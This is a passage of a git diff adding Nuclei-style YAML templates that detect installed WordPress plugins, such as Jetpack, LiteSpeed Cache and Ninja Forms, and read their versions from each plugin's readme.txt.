https://wpscan.com/plugin/insert-headers-and-footers + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-instagram-feed.yaml b/technologies/wordpress/wordpress-instagram-feed.yaml new file mode 100644 index 0000000000..1f2082468c --- /dev/null +++ b/technologies/wordpress/wordpress-instagram-feed.yaml @@ -0,0 +1,35 @@ + +id: wordpress-instagram-feed + +info: + name: Smash Balloon Social Photo Feed Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/instagram-feed/ + metadata: + plugin_namespace: instagram-feed + wpscan: https://wpscan.com/plugin/instagram-feed + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml new file mode 100644 index 0000000000..e2b5d70e42 --- /dev/null +++ b/technologies/wordpress/wordpress-intuitive-custom-post-order.yaml @@ -0,0 +1,35 @@ + +id: wordpress-intuitive-custom-post-order + +info: + name: Intuitive Custom Post Order Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/intuitive-custom-post-order/ + metadata: + plugin_namespace: intuitive-custom-post-order + wpscan: https://wpscan.com/plugin/intuitive-custom-post-order + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-iwp-client.yaml b/technologies/wordpress/wordpress-iwp-client.yaml new file mode 100644 index 0000000000..f845dbd46d --- /dev/null +++ b/technologies/wordpress/wordpress-iwp-client.yaml @@ -0,0 +1,35 @@ + +id: wordpress-iwp-client + +info: + name: InfiniteWP Client Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/iwp-client/ + metadata: + plugin_namespace: iwp-client + wpscan: https://wpscan.com/plugin/iwp-client + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-jetpack.yaml b/technologies/wordpress/wordpress-jetpack.yaml new file mode 100644 index 0000000000..c809e7d16f --- /dev/null +++ b/technologies/wordpress/wordpress-jetpack.yaml @@ -0,0 +1,35 @@ + +id: wordpress-jetpack + +info: + name: Jetpack – WP Security, Backup, Speed, & Growth Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/jetpack/ + metadata: + plugin_namespace: jetpack + wpscan: https://wpscan.com/plugin/jetpack + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-kadence-blocks.yaml b/technologies/wordpress/wordpress-kadence-blocks.yaml new file mode 100644 index 0000000000..0afb440920 --- /dev/null +++ b/technologies/wordpress/wordpress-kadence-blocks.yaml @@ -0,0 +1,35 @@ + +id: wordpress-kadence-blocks + +info: + name: Gutenberg Blocks by Kadence Blocks – Page Builder Features Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/kadence-blocks/ + metadata: + plugin_namespace: kadence-blocks + wpscan: https://wpscan.com/plugin/kadence-blocks + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-kirki.yaml b/technologies/wordpress/wordpress-kirki.yaml new file mode 100644 index 0000000000..d0327f7774 --- /dev/null +++ b/technologies/wordpress/wordpress-kirki.yaml @@ -0,0 +1,35 @@ + +id: wordpress-kirki + +info: + name: Kirki Customizer Framework Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/kirki/ + metadata: + plugin_namespace: kirki + wpscan: https://wpscan.com/plugin/kirki + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-leadin.yaml b/technologies/wordpress/wordpress-leadin.yaml new file mode 100644 index 0000000000..25d12526da --- /dev/null +++ b/technologies/wordpress/wordpress-leadin.yaml @@ -0,0 +1,35 @@ + +id: wordpress-leadin + +info: + name: HubSpot – CRM, Email Marketing, Live Chat, Forms & Analytics Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/leadin/ + metadata: + plugin_namespace: leadin + wpscan: https://wpscan.com/plugin/leadin + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml new file mode 100644 index 0000000000..25df5be501 --- /dev/null +++ b/technologies/wordpress/wordpress-limit-login-attempts-reloaded.yaml @@ -0,0 +1,35 @@ + +id: wordpress-limit-login-attempts-reloaded + +info: + name: Limit Login Attempts Reloaded Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/limit-login-attempts-reloaded/ + metadata: + plugin_namespace: limit-login-attempts-reloaded + wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-limit-login-attempts.yaml b/technologies/wordpress/wordpress-limit-login-attempts.yaml new file mode 100644 index 0000000000..4eee9b04ba --- /dev/null +++ b/technologies/wordpress/wordpress-limit-login-attempts.yaml @@ -0,0 +1,35 @@ + +id: wordpress-limit-login-attempts + +info: + name: Limit Login Attempts Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/limit-login-attempts/ + metadata: + plugin_namespace: limit-login-attempts + wpscan: https://wpscan.com/plugin/limit-login-attempts + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-litespeed-cache.yaml b/technologies/wordpress/wordpress-litespeed-cache.yaml new file mode 100644 index 0000000000..6192bf3ffc --- /dev/null +++ b/technologies/wordpress/wordpress-litespeed-cache.yaml @@ -0,0 +1,35 @@ + +id: wordpress-litespeed-cache + +info: + name: LiteSpeed Cache Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/litespeed-cache/ + metadata: + plugin_namespace: litespeed-cache + wpscan: https://wpscan.com/plugin/litespeed-cache + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-loco-translate.yaml b/technologies/wordpress/wordpress-loco-translate.yaml new file mode 100644 index 0000000000..df51bdc84c --- /dev/null +++ b/technologies/wordpress/wordpress-loco-translate.yaml @@ -0,0 +1,35 @@ + +id: wordpress-loco-translate + +info: + name: Loco Translate Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/loco-translate/ + metadata: + plugin_namespace: loco-translate + wpscan: https://wpscan.com/plugin/loco-translate + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-loginizer.yaml b/technologies/wordpress/wordpress-loginizer.yaml new file mode 100644 index 0000000000..a0a5638813 --- /dev/null +++ b/technologies/wordpress/wordpress-loginizer.yaml @@ -0,0 +1,35 @@ + +id: wordpress-loginizer + +info: + name: Loginizer Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/loginizer/ + metadata: + plugin_namespace: loginizer + wpscan: https://wpscan.com/plugin/loginizer + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-loginpress.yaml b/technologies/wordpress/wordpress-loginpress.yaml new file mode 100644 index 0000000000..950176ff47 --- /dev/null +++ b/technologies/wordpress/wordpress-loginpress.yaml @@ -0,0 +1,35 @@ + +id: wordpress-loginpress + +info: + name: LoginPress | Custom Login Page Customizer Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/loginpress/ + metadata: + plugin_namespace: loginpress + wpscan: https://wpscan.com/plugin/loginpress + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/loginpress/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml new file mode 100644 index 0000000000..c6346c8f36 --- /dev/null +++ b/technologies/wordpress/wordpress-mailchimp-for-woocommerce.yaml @@ -0,0 +1,35 @@ + +id: wordpress-mailchimp-for-woocommerce + +info: + name: Mailchimp for WooCommerce Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/mailchimp-for-woocommerce/ + metadata: + plugin_namespace: mailchimp-for-woocommerce + wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mailchimp-for-wp.yaml b/technologies/wordpress/wordpress-mailchimp-for-wp.yaml new file mode 100644 index 0000000000..7944c420c9 --- /dev/null +++ b/technologies/wordpress/wordpress-mailchimp-for-wp.yaml @@ -0,0 +1,34 @@ +id: wordpress-mailchimp-for-wp + +info: + name: MC4WP Mailchimp for WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/mailchimp-for-wp/ + metadata: + plugin_namespace: mailchimp-for-wp + wpscan: https://wpscan.com/plugin/mailchimp-for-wp + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - "(?i)Stable.Tag" + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mailpoet.yaml b/technologies/wordpress/wordpress-mailpoet.yaml new file mode 100644 index 0000000000..381ba2c505 --- /dev/null +++ b/technologies/wordpress/wordpress-mailpoet.yaml @@ -0,0 +1,35 @@ + +id: wordpress-mailpoet + +info: + name: MailPoet – emails and newsletters in WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/mailpoet/ + metadata: + plugin_namespace: mailpoet + wpscan: https://wpscan.com/plugin/mailpoet + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-maintenance.yaml b/technologies/wordpress/wordpress-maintenance.yaml new file mode 100644 index 0000000000..6c79d17443 --- /dev/null +++ b/technologies/wordpress/wordpress-maintenance.yaml @@ -0,0 +1,35 @@ + +id: wordpress-maintenance + +info: + name: Maintenance Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/maintenance/ + metadata: + plugin_namespace: maintenance + wpscan: https://wpscan.com/plugin/maintenance + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-mainwp-child.yaml b/technologies/wordpress/wordpress-mainwp-child.yaml new file mode 100644 index 0000000000..925d4e73ee --- /dev/null +++ b/technologies/wordpress/wordpress-mainwp-child.yaml @@ -0,0 +1,35 @@ + +id: wordpress-mainwp-child + +info: + name: MainWP Child – Securely Connects Sites to the MainWP WordPress Manager Dashboard Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/mainwp-child/ + metadata: + plugin_namespace: mainwp-child + wpscan: https://wpscan.com/plugin/mainwp-child + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/mainwp-child/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-malcare-security.yaml b/technologies/wordpress/wordpress-malcare-security.yaml new file mode 100644 index 0000000000..f90c5f487b --- /dev/null +++ b/technologies/wordpress/wordpress-malcare-security.yaml @@ -0,0 +1,35 @@ + +id: wordpress-malcare-security + +info: + name: MalCare WordPress Security Plugin – Malware Scanner, Cleaner, Security Firewall Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/malcare-security/ + metadata: + plugin_namespace: malcare-security + wpscan: https://wpscan.com/plugin/malcare-security + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/malcare-security/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-megamenu.yaml b/technologies/wordpress/wordpress-megamenu.yaml new file mode 100644 index 0000000000..9d3c88d547 --- /dev/null +++ b/technologies/wordpress/wordpress-megamenu.yaml @@ -0,0 +1,35 @@ + +id: wordpress-megamenu + +info: + name: Max Mega Menu Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/megamenu/ + metadata: + plugin_namespace: megamenu + wpscan: https://wpscan.com/plugin/megamenu + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/megamenu/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-members.yaml b/technologies/wordpress/wordpress-members.yaml new file mode 100644 index 0000000000..7fd08a6710 --- /dev/null +++ b/technologies/wordpress/wordpress-members.yaml @@ -0,0 +1,35 @@ + +id: wordpress-members + +info: + name: Members – Membership & User Role Editor Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/members/ + metadata: + plugin_namespace: members + wpscan: https://wpscan.com/plugin/members + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/members/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-meta-box.yaml b/technologies/wordpress/wordpress-meta-box.yaml new file mode 100644 index 0000000000..4a394300f0 --- /dev/null +++ b/technologies/wordpress/wordpress-meta-box.yaml @@ -0,0 +1,35 @@ + +id: wordpress-meta-box + +info: + name: Meta Box – WordPress Custom Fields Framework Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/meta-box/ + metadata: + plugin_namespace: meta-box + wpscan: https://wpscan.com/plugin/meta-box + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/meta-box/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ml-slider.yaml b/technologies/wordpress/wordpress-ml-slider.yaml new file mode 100644 index 0000000000..aa631c10fb --- /dev/null +++ b/technologies/wordpress/wordpress-ml-slider.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ml-slider + +info: + name: Slider, Gallery, and Carousel by MetaSlider – Responsive WordPress Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ml-slider/ + metadata: + plugin_namespace: ml-slider + wpscan: https://wpscan.com/plugin/ml-slider + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ml-slider/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-newsletter.yaml b/technologies/wordpress/wordpress-newsletter.yaml new file mode 100644 index 0000000000..041d3c79a9 --- /dev/null +++ b/technologies/wordpress/wordpress-newsletter.yaml @@ -0,0 +1,35 @@ + +id: wordpress-newsletter + +info: + name: Newsletter – Send awesome emails from WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/newsletter/ + metadata: + plugin_namespace: newsletter + wpscan: https://wpscan.com/plugin/newsletter + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/newsletter/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-nextend-facebook-connect.yaml b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml new file mode 100644 index 0000000000..2a0593c1c8 --- /dev/null +++ b/technologies/wordpress/wordpress-nextend-facebook-connect.yaml @@ -0,0 +1,35 @@ + +id: wordpress-nextend-facebook-connect + +info: + name: Nextend Social Login and Register Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/nextend-facebook-connect/ + metadata: + plugin_namespace: nextend-facebook-connect + wpscan: https://wpscan.com/plugin/nextend-facebook-connect + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/nextend-facebook-connect/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-nextgen-gallery.yaml b/technologies/wordpress/wordpress-nextgen-gallery.yaml new file mode 100644 index 0000000000..0640efbddc --- /dev/null +++ b/technologies/wordpress/wordpress-nextgen-gallery.yaml @@ -0,0 +1,35 @@ + +id: wordpress-nextgen-gallery + +info: + name: WordPress Gallery Plugin – NextGEN Gallery Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/nextgen-gallery/ + metadata: + plugin_namespace: nextgen-gallery + wpscan: https://wpscan.com/plugin/nextgen-gallery + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ninja-forms.yaml b/technologies/wordpress/wordpress-ninja-forms.yaml new file mode 100644 index 0000000000..ca0c5db4e8 --- /dev/null +++ b/technologies/wordpress/wordpress-ninja-forms.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ninja-forms + +info: + name: Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ninja-forms/ + metadata: + plugin_namespace: ninja-forms + wpscan: https://wpscan.com/plugin/ninja-forms + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ocean-extra.yaml b/technologies/wordpress/wordpress-ocean-extra.yaml new file mode 100644 index 0000000000..59a4d4aa9a --- /dev/null +++ b/technologies/wordpress/wordpress-ocean-extra.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ocean-extra + +info: + name: Ocean Extra Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ocean-extra/ + metadata: + plugin_namespace: ocean-extra + wpscan: https://wpscan.com/plugin/ocean-extra + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-official-facebook-pixel.yaml b/technologies/wordpress/wordpress-official-facebook-pixel.yaml new file mode 100644 index 0000000000..7bdc6298b6 --- /dev/null +++ b/technologies/wordpress/wordpress-official-facebook-pixel.yaml @@ -0,0 +1,35 @@ + +id: wordpress-official-facebook-pixel + +info: + name: Meta pixel for WordPress Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/official-facebook-pixel/ + metadata: + plugin_namespace: official-facebook-pixel + wpscan: https://wpscan.com/plugin/official-facebook-pixel + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-one-click-demo-import.yaml b/technologies/wordpress/wordpress-one-click-demo-import.yaml new file mode 100644 index 0000000000..bbc7fc8d99 --- /dev/null +++ b/technologies/wordpress/wordpress-one-click-demo-import.yaml @@ -0,0 +1,35 @@ + +id: wordpress-one-click-demo-import + +info: + name: One Click Demo Import Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/one-click-demo-import/ + metadata: + plugin_namespace: one-click-demo-import + wpscan: https://wpscan.com/plugin/one-click-demo-import + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-optinmonster.yaml b/technologies/wordpress/wordpress-optinmonster.yaml new file mode 100644 index 0000000000..fe15cec168 --- /dev/null +++ b/technologies/wordpress/wordpress-optinmonster.yaml @@ -0,0 +1,35 @@ + +id: wordpress-optinmonster + +info: + name: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/optinmonster/ + metadata: + plugin_namespace: optinmonster + wpscan: https://wpscan.com/plugin/optinmonster + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-password-protected.yaml b/technologies/wordpress/wordpress-password-protected.yaml new file mode 100644 index 0000000000..3fa00f864a --- /dev/null +++ b/technologies/wordpress/wordpress-password-protected.yaml @@ -0,0 +1,35 @@ + +id: wordpress-password-protected + +info: + name: Password Protected Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/password-protected/ + metadata: + plugin_namespace: password-protected + wpscan: https://wpscan.com/plugin/password-protected + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-pdf-embedder.yaml b/technologies/wordpress/wordpress-pdf-embedder.yaml new file mode 100644 index 0000000000..710f4c90c5 --- /dev/null +++ b/technologies/wordpress/wordpress-pdf-embedder.yaml @@ -0,0 +1,35 @@ + +id: wordpress-pdf-embedder + +info: + name: PDF Embedder Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/pdf-embedder/ + metadata: + plugin_namespace: pdf-embedder + wpscan: https://wpscan.com/plugin/pdf-embedder + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" + matchers-condition: and + matchers: + - type: regex + 